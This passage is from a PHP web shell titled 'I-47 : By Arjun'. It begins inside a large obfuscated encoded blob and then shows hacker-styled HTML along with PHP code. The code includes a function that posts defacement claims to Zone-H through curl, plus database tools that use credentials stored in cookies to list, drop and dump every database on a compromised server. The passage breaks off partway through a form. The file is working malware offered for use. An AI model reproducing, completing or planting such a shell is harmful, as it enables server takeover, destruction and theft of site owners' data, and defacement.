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";
89.  
90. ?>
91. <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
92. <title>I-47 : By Arjun</title>
93. <script type="text/javascript">
94. checked = false;
95. function checkedAll ()
96. {
97. if (checked == false){checked = true}else{checked = false}
98. for (var i = 0; i < document.getElementById('myform').elements.length; i++)
99. {
100. document.getElementById('myform').elements[i].checked = checked;
101. }
102. }
103. </script>
104. <style type="text/css">
105. <!--
106.  
107. body,td,th {
108. color: #FF0000;
109. }
110. input.but {
111. background-color:#006633;
112. color: white;
113. border : 1px solid #ccc;
114. }
115. a:link {
116. color: #00FF00;
117. text-decoration:none;
118. font-weight:600;
119. }
120. a:hover {
121. color:#00FF00;
122. text-decoration:underline;
123. }
124. font.txt
125. {
126. color: #00FF00;
127. text-decoration:none;
128. font-size:17px;
129. }
130. a:visited {
131. color: #006600;
132. }
133. input.box
134. {
135. background-color:#0C0C0C;
136. color: white;
137. border : 1px solid #ccc;
138. -moz-border-radius:7px;
139. width:400;
140. border-radius:7px;
141. }
142. input.sbox
143. {
144. background-color:#0C0C0C;
145. color: white;
146. border : 1px solid #ccc;
147. -moz-border-radius:7px;
148. width:180;
149. border-radius:7px;
150. }
151. select.sbox
152. {
153. background-color:#0C0C0C;
154. color: white;
155. border : 1px solid #ccc;
156. -moz-border-radius:7px;
157. width:180;
158. border-radius:7px;
159. }
160. select.box
161. {
162. background-color:#0C0C0C;
163. color: white;
164. border : 1px solid #ccc;
165. -moz-border-radius:7px;
166. width:400;
167. border-radius:7px;
168. }
169.  
170. textarea.box
171. {
172. border : 3px solid #111;
173. background-color:#161616;
174. color : white;
175. margin-top: 10px;
176. -moz-border-radius:7px;
177. border-radius:7px;
178. }
179. body {
180. background-color:#000000;
181. }
182. -->
183. </style>
184. <body>
185. <?php
186.  
187. $self=$_SERVER["PHP_SELF"];
188. $os = "N/D";
189. if(stristr(php_uname(),"Windows"))
190. {
191. $SEPARATOR = '\\';
192. $os = "Windows";
193. $directorysperator="\\";
194.  
195. }
196. else if(stristr(php_uname(),"Linux"))
197. {
198. $os = "Linux";
199. $directorysperator='/';
200.  
201. }
202. function Trail($d,$directsperator)
203. {
204. $d=explode($directsperator,$d);
205. array_pop($d);
206. array_pop($d);
207. $str=implode($d,$directsperator);
208. return $str;
209. }
210.  
211.  
212.  
213. // Zone-h Poster
214. function ZoneH($url, $hacker, $hackmode,$reson, $site )
215. {
216. $k = curl_init();
217. curl_setopt($k, CURLOPT_URL, $url);
218. curl_setopt($k,CURLOPT_POST,true);
219. curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
220. curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
221. curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
222. $kubra = curl_exec($k);
223. curl_close($k);
224. return $kubra;
225. }
226.  
227. // Database functions
228. function listdatabase()
229. {
230. $self=$_SERVER["PHP_SELF"];
231. $mysqlHandle = mysql_connect ($_COOKIE['dbserver'], $_COOKIE['dbuser'], $_COOKIE['dbpass']);
232. $result = mysql_query("SHOW DATABASE");
233. echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
234.  
235. $pDB = mysql_list_dbs( $mysqlHandle );
236. $num = mysql_num_rows( $pDB );
237. for( $i = 0; $i < $num; $i++ )
238. {
239. $dbname = mysql_dbname( $pDB, $i );
240. mysql_select_db($dbname,$mysqlHandle);
241. $result = mysql_query("SHOW TABLES");
242. $num_of_tables = mysql_num_rows($result);
243. echo "<tr>\n";
244. echo "<td><a href='$self?action=listTables&dbname=$dbname'><font color=red size=3>$dbname</font></a> ($num_of_tables)</td>\n";
245. echo "<td><a href='$self?action=listTables&dbname=$dbname'>Tables</a></td>\n";
246. echo "<td><a href='$self?action=dropDB&dbname=$dbname&executequery' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n";
247. echo "<td><a href='$self?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
248. echo "</tr>\n";
249. }
250. echo "</table>\n";
251. mysql_close($mysqlHandle);
252. }
253.  
254. function listtable()
255. {
256. $self=$_SERVER["PHP_SELF"];
257. $dbserver = $_COOKIE["dbserver"];
258. $dbuser = $_COOKIE["dbuser"];
259. $dbpass = $_COOKIE["dbpass"];
260. $dbname = $_GET['dbname'];
261. echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>&gt;</font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
262. ?>
263. <br><br>
264. <form>
265. <input type="hidden" name="action" value="createtable">
266. <input type="hidden" name="dbname" value="<?php echo $_GET['dbname'];?>">
267. <table>
268. <tr>
269. <td><input type="text" class="box" name="tablename"></td><td><input type="submit" value=" Create Table " name="createmydb" class="but"></td>
270. </tr>
271. </table>
272.  
273. <br>
274. <form>
275. <input type="hidden" value="<?php echo $_GET['dbname']; ?>" name="dbname">
276. <input type="hidden" value="<?php echo $_GET['tablename']; ?>" name="tablename">
277. <input type="hidden" value="executequery" name="action">
278. <table>
